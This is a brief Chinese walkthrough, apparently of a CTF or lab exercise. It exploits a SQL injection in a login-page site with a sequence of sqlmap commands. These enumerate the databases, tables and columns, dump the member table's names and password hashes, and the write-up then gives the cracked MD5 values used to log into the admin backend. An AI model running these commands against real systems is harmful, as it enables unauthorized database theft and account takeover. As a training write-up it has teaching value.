打开页面发现一个登录框。还有一个通知。


直接扔sqlmap里面跑
sqlmap -u http://219.153.49.228:40395/new_list.php?id=1

然后开始爆裤
sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 --dbs

接下来就是报表/字段/数据
sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup --tables
sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup -T member --columns
sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup -T member -C name,password --dump

然后解码md5
3114b433dece9180717f2b7de56b28a3解(528469)
870a77a3bdc1ff88e85cdcc250d78857解(402315)
登录后台发现第一个被禁用,第二个登录成功

大概就这些。